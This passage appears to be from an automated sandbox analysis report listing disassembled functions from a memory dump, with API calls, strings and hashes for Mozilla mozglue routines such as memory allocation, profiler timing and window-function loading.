?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C4BD6A6
LeaveCriticalSection.KERNEL32(6C51E7DC), ref: 6C4BD712
LeaveCriticalSection.KERNEL32(6C51E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C4CD1C5), ref: 6C4BD751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C4BD7EA

Strings

: (malloc) Error initializing arena, xrefs: 6C4BD82C
<jemalloc>, xrefs: 6C4BD827

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: eb6db3ef175bd0625ffa761c4c485a31631d30abda001cc9f155c49ddd966cfd
Instruction ID: 1ba795b12e70fa0bd4b6f555554bccf3a8bfeec8f284fa1584d795643c32e4e2
Opcode Fuzzy Hash: eb6db3ef175bd0625ffa761c4c485a31631d30abda001cc9f155c49ddd966cfd
Instruction Fuzzy Hash: 30911671A043418FE718CF28C498F6AB7E1EB89314F154A6ED45AD7F88D770E845CB92

Function 6C4F4EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6C4F4EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C4F4F2E
moz_xmalloc.MOZGLUE ref: 6C4F4F52
memset.VCRUNTIME140(00000000,00000000), ref: 6C4F4F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C4F52B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C4F52E6
Sleep.KERNEL32(00000010), ref: 6C4F5481
free.MOZGLUE(?), ref: 6C4F5498

Strings

(, xrefs: 6C4F5250

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: f9a4abc7611cb48d35e9a6c86ddc0cc62ae61ad188f02301ff74128e5f49a1de
Instruction ID: 294e4027532cc7f25464fb7f565490f8500dc2055e62999ae1eafa953ea3f960
Opcode Fuzzy Hash: f9a4abc7611cb48d35e9a6c86ddc0cc62ae61ad188f02301ff74128e5f49a1de
Instruction Fuzzy Hash: DEF1C271A19B008FC716CF38C851A2BB7F5AFD6384F068B2EF856A7651DB319442CB81

Function 6C4D5190 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 331timeCOMMON

Download Yara Rule

APIs

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C4D51DF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C4D529C
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6C4D52FF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C4D536D
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C4D53F7

Part of subcall function 6C4CAB89: EnterCriticalSection.KERNEL32(6C51E370,?,?,?,6C4934DE,6C51F6CC,?,?,?,?,?,?,?,6C493284), ref: 6C4CAB94
Part of subcall function 6C4CAB89: LeaveCriticalSection.KERNEL32(6C51E370,?,6C4934DE,6C51F6CC,?,?,?,?,?,?,?,6C493284,?,?,6C4B56F6), ref: 6C4CABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6C4D56C3
__Init_thread_footer.LIBCMT ref: 6C4D56E0

Strings

MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6C4D56BE

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
String ID: MOZ_PROFILER_RECORD_OVERHEADS
API String ID: 1227157289-345010206
Opcode ID: fec18b82aec4ae842d9cbba87d7aacd1c1a0c6e093a0849b81add42d5b1b78c4
Instruction ID: 796cb8552fa86a67f5eb53009a1e29283184ea48ac63c75f5b7f39e1643afe20
Opcode Fuzzy Hash: fec18b82aec4ae842d9cbba87d7aacd1c1a0c6e093a0849b81add42d5b1b78c4
Instruction Fuzzy Hash: 08E1A075914F458AC712DF348820A67B7B9FF9B395F119B0EE8AB6A910DF30E046C741

Function 6C4F7030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 6C4F7046
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C4F7060
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C4F707E

Part of subcall function 6C4A81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C4A81DE

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C4F7096
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C4F709C
LocalFree.KERNEL32(?), ref: 6C4F70AA

Strings

(null), xrefs: 6C4F706A, 6C4F7083
### ERROR: %s: %s, xrefs: 6C4F7087

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
String ID: ### ERROR: %s: %s$(null)
API String ID: 2989430195-1695379354
Opcode ID: 49883c3e772055c0bf14b18cf43b54a59a7ff7797155547101e5a0e5d8a5de4e
Instruction ID: c10171d298118618593db84cbfca3b27390ef5e12c1ffcedae316ba19ef45abe
Opcode Fuzzy Hash: 49883c3e772055c0bf14b18cf43b54a59a7ff7797155547101e5a0e5d8a5de4e
Instruction Fuzzy Hash: 7E01BEF1A001046FDB04AB64DC4FDAF7BBCEF49254F010529F505A7741D67169148BE5

Function 6C4E2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C4E2C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C4E2C61

Part of subcall function 6C494DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C494E5A
Part of subcall function 6C494DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C494E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C4E2C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C4E2E2D

Part of subcall function 6C4A81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C4A81DE

Strings

(root), xrefs: 6C4E354F
expected a Time entry, xrefs: 6C4E2E36
ProfileBuffer parse error: %s, xrefs: 6C4E2E3B

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: 069774cf2e8ccdaf909b540dbc8f2d5f96d7337fde2eab97860842dc2bb5aa05
Instruction ID: e4acd32d7e94fe5756f6935d85ff8c48435a24f7bf89bc482d822c536fc00af8
Opcode Fuzzy Hash: 069774cf2e8ccdaf909b540dbc8f2d5f96d7337fde2eab97860842dc2bb5aa05
Instruction Fuzzy Hash: 8591B0706087418FD725CF28C484EAFB7E1AF89359F11491DE99A87B60DF30D949CB92

Function 6C4F9E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6C4F9F3D
__aulldiv.LIBCMT ref: 6C4F9F77
__aullrem.LIBCMT ref: 6C4F9F8C
__aulldiv.LIBCMT ref: 6C4FA023

Strings

NaN, xrefs: 6C4F9EAB
-Infinity, xrefs: 6C4F9E60, 6C4F9E7B

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: e67d2f40d76c0acbbe3b28b6e780f370f4cc9a7b7bdccef01a4aea67d1580acb
Instruction ID: 71ee06e33f16735fa9753e82551ae597e3721e84055f9ebd8b700ed8ee1ec86a
Opcode Fuzzy Hash: e67d2f40d76c0acbbe3b28b6e780f370f4cc9a7b7bdccef01a4aea67d1580acb
Instruction Fuzzy Hash: 3CC19C31E043188FDB14CFA8C890F9EB7B6AF84714F55452DD425ABB80DB71A94ACBD1

Function 6C50545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C508A4B

Strings

~qIl, xrefs: 6C50921F, 6C5056C7, 6C505740, 6C509459, 6C505703, 6C509269, 6C50948F

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: memset
String ID: ~qIl
API String ID: 2221118986-2586366955
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: b1a9a76b7232084d52c21d0018fb82b5018113498a4dd73f52065b120ced4672
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: 98B1D672B0121ACFDB14CF68CC91BE9B7B2EF85314F1802A9C549DB795E730A985CB91

Function 6C50542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C5088F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C50925C

Strings

~qIl, xrefs: 6C50921F, 6C5056C7, 6C505740, 6C509459, 6C505703, 6C509269, 6C50948F

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: memset
String ID: ~qIl
API String ID: 2221118986-2586366955
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 9274ec815c3d43ee536a3fdc1acc0f1711a60833f25931ca69dc134baa273e1e
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: FEB1B572F0120ACBDB14CE58CC81AEDB7B6AF85314F190279C949DB785D730A989CB91

Function 6C5050C7 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 280COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C508E18
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C50925C

Strings

~qIl, xrefs: 6C50921F, 6C5056C7, 6C505740, 6C509459, 6C505703, 6C509269, 6C50948F

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: memset
String ID: ~qIl
API String ID: 2221118986-2586366955
Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction ID: dabbdd4153a4739a4e9f62f8fed6391cb43bd017422b0c63606f5343f5887457
Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction Fuzzy Hash: 1AA1D672B00116CFCB14CE68CC80BE9B7B6AF85314F1942B9C949EB785D730A999CB91

Function 6C4FB910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4A9B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6C4FB92D), ref: 6C4A9BC8
Part of subcall function 6C4A9B80: __Init_thread_footer.LIBCMT ref: 6C4A9BDB

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C4A03D4,?), ref: 6C4FB955
NtQueryVirtualMemory.NTDLL(00000000,?,00000000,?,0000001C,0000001C), ref: 6C4FB9A5
NtQueryVirtualMemory.NTDLL(00000000,?,00000000,?,0000001C,00000000), ref: 6C4FBA20
RtlNtStatusToDosError.NTDLL ref: 6C4FBA7B
RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C4FBA81
GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C4FBA86

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
String ID:
API String ID: 1753913139-0
Opcode ID: 7dec3d7a925bc690ec40b841fe09fd2c76e17841f81905e3e15c507ef7a36974
Instruction ID: ed6c970fdb212e95029c12e9da55b9a3f7118033df6025633da8eea0100db76c
Opcode Fuzzy Hash: 7dec3d7a925bc690ec40b841fe09fd2c76e17841f81905e3e15c507ef7a36974
Instruction Fuzzy Hash: DE514871E01219DFDF14CEA8D880EDEB7B6AF89354F254129E911B7B04DB30AD468BA1

Function 6C4E77A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C4E7A81
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C4E7A93

Part of subcall function 6C4B5C50: GetTickCount64.KERNEL32 ref: 6C4B5D40
Part of subcall function 6C4B5C50: EnterCriticalSection.KERNEL32(6C51F688), ref: 6C4B5D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C4E7AA1

Part of subcall function 6C4B5C50: __aulldiv.LIBCMT ref: 6C4B5DB4
Part of subcall function 6C4B5C50: LeaveCriticalSection.KERNEL32(6C51F688), ref: 6C4B5DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C4E7B31

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
String ID:
API String ID: 4054851604-0
Opcode ID: 2e77a1133731d04660b0e181fd6273170715004c5d168f40b0c55a067280d3cf
Instruction ID: 6298a8609ac0bfcbe92aaf1b2813c1d15ca649f16fc8c6ad26b2627543b4142d
Opcode Fuzzy Hash: 2e77a1133731d04660b0e181fd6273170715004c5d168f40b0c55a067280d3cf
Instruction Fuzzy Hash: 3FB180356083908BDB14CF64C450E5FB7E2BFC9329F164A1CE99567B92D770E90ACB82

Function 6C4FB700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL(000000FF,00000000,00000000,?,0000001C,6C4CFE3F), ref: 6C4FB720
RtlNtStatusToDosError.NTDLL ref: 6C4FB75A
RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,00000000,?,?,00000000,?,6C4CFE3F), ref: 6C4FB760

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Error$LastMemoryQueryStatusVirtualWin32
String ID:
API String ID: 304294125-0
Opcode ID: 5ba6d9d22218765c307699681ffc77326e76a0af52c380bdfc5d03b661514827
Instruction ID: 00492370f5404af823fa83a57a76b777733338f9f8cf7e4e52e3c482c39e7178
Opcode Fuzzy Hash: 5ba6d9d22218765c307699681ffc77326e76a0af52c380bdfc5d03b661514827
Instruction Fuzzy Hash: 63F0AFB0E0020CEEEF01DAA1CC85FEF77FC9B8931AF105129E521A56C1D774A988C662

Function 6C4FB8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON

Download Yara Rule

APIs

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C4A03D4,?), ref: 6C4FB955
NtQueryVirtualMemory.NTDLL(00000000,?,00000000,?,0000001C,0000001C), ref: 6C4FB9A5

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: MemoryQueryVirtualrand_s
String ID:
API String ID: 1889792194-0
Opcode ID: b8c66894fc9b43460cbcbd9f9fd0cb345adcb0f044645b67f4508ba2f23fcca4
Instruction ID: 827514a6a7b49e7ec2c74f4698ca8022c14d81499940e955e190f68647dc88ee
Opcode Fuzzy Hash: b8c66894fc9b43460cbcbd9f9fd0cb345adcb0f044645b67f4508ba2f23fcca4
Instruction Fuzzy Hash: 0941B471F002199FDF04CFA8D885EDEB7B5EFC9354F148129E815A7B14EB30A8458B91

Function 6C4F55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C4CE1A5), ref: 6C4F5606
LoadLibraryW.KERNEL32(gdi32,?,6C4CE1A5), ref: 6C4F560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C4F5633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C4F563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C4F566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C4F567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C4F5696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C4F56B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C4F56CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C4F56E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C4F56FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C4F5716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C4F572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C4F5748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C4F5761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C4F577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C4F5793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C4F57A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C4F57BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C4F57D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C4F57EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C4F57FF

Strings

ReleaseDC, xrefs: 6C4F5742
EnableNonClientDpiScaling, xrefs: 6C4F5666
GetDpiForWindow, xrefs: 6C4F5690
GetThreadDpiAwarenessContext, xrefs: 6C4F562D
FillRect, xrefs: 6C4F5729
gdi32, xrefs: 6C4F560A
RegisterClassW, xrefs: 6C4F56AC
GetSystemMetricsForDpi, xrefs: 6C4F5677
GetWindowDC, xrefs: 6C4F5710
DeleteObject, xrefs: 6C4F57F9
LoadCursorW, xrefs: 6C4F5774
GetMonitorInfoW, xrefs: 6C4F57A2
SetWindowLongPtrW, xrefs: 6C4F57B7
CreateSolidBrush, xrefs: 6C4F57E4
SetWindowPos, xrefs: 6C4F56F7
LoadIconW, xrefs: 6C4F575B
CreateWindowExW, xrefs: 6C4F56C5
ShowWindow, xrefs: 6C4F56DE
MonitorFromWindow, xrefs: 6C4F578D
AreDpiAwarenessContextsEqual, xrefs: 6C4F5637
StretchDIBits, xrefs: 6C4F57CC
user32, xrefs: 6C4F5601

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: a2e50a35dda7c82482f7ac9205db0775b7bb58f3bb5fd98a43b09044d897eaa4
Instruction ID: 6fee82981eea7d62cb2f8766786b379697d459f33ae8ce77052f0006fbf4944d
Opcode Fuzzy Hash: a2e50a35dda7c82482f7ac9205db0775b7bb58f3bb5fd98a43b09044d897eaa4
Instruction Fuzzy Hash: 5B5177B07157066BEB00FF358D4DD2A3AF9AB46345B128625A921E2F43EF74C811CF68

Function 6C4DCC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

